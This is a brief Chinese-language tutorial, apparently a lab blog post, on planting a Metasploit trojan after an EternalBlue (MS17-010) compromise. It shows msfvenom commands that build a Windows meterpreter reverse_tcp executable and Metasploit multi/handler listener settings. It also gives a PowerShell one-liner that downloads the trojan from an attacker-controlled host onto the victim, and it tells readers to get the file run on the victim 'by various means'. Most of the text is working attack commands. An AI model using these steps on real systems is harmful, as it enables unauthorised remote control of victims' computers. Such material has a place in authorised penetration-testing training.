刚刚试了下永恒之蓝,看到有人用木马,也补一下后面的其他
环境和那一片的一样

  1. msfvenom模块,首先生成.exe木马文件
    
1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.77.0.109 lport=4443f exe >/root/1.exe

1.exe 就是木马 要把这个用各种方法去受害机运行

![在这里插入图片描述](/images/2019060616093520.png
2. 输入msfconsole进入metasploi
3. 进入监听模块

1
use exploit/multi/handler
  1. 设置payload反弹
    
1
set payload windows/meterpreter/reverse_tcp
  1. 设置监听ip端口
    
1
2
3
set lhost 10.77.0.109
set lport 4443
要与木马一致
  1. 运行![在这里插入图片描述](/images/20190606161629689.png
    kali这边就准备完了,等待上线

在目标主机运行 1.exe 木马

利用是之前的ms17010直接shell

1
powershell (new-object System.Net.WebClient).DownloadFile( 'http://10.77.0.100/1.exe','c:\1.exe')

![在这里插入图片描述](/images/20190606164405347.png
上线成功

后续的。。再写